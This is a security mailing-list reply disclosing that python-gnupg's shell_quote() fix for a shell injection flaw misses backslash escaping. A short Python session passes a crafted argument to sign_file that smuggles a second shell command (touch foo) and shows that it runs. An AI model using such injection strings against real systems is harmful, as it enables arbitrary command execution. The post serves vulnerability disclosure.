Re: CVE request: python-gnupg before 0.3.5 shell injection

[Matthew Daley <mattd () bugfuzz com>]

On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri () nerv fi> wrote:
> On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote:
> > python-gnupg 0.3.5 lists in the changelog:
> > "Added improved shell quoting to guard against shell injection."
> >
> > Sounds like a severe security issue, but further info is lacking.
>
> Diff attached. New function shell_quote() seems to represent major changes to
> shell input quoting against unsafe input.
> [...]

This appears to (at least) miss escaping of backslashes:

$ ls foo
ls: cannot access foo: No such file or directory
$ python
Python 2.7.6 (default, Jan 11 2014, 14:34:26)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
> > > import gnupg
> > > gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'")
<gnupg.Sign object at 0x7fb3dbfad7d0>
> > >
$ ls foo
foo

- Matthew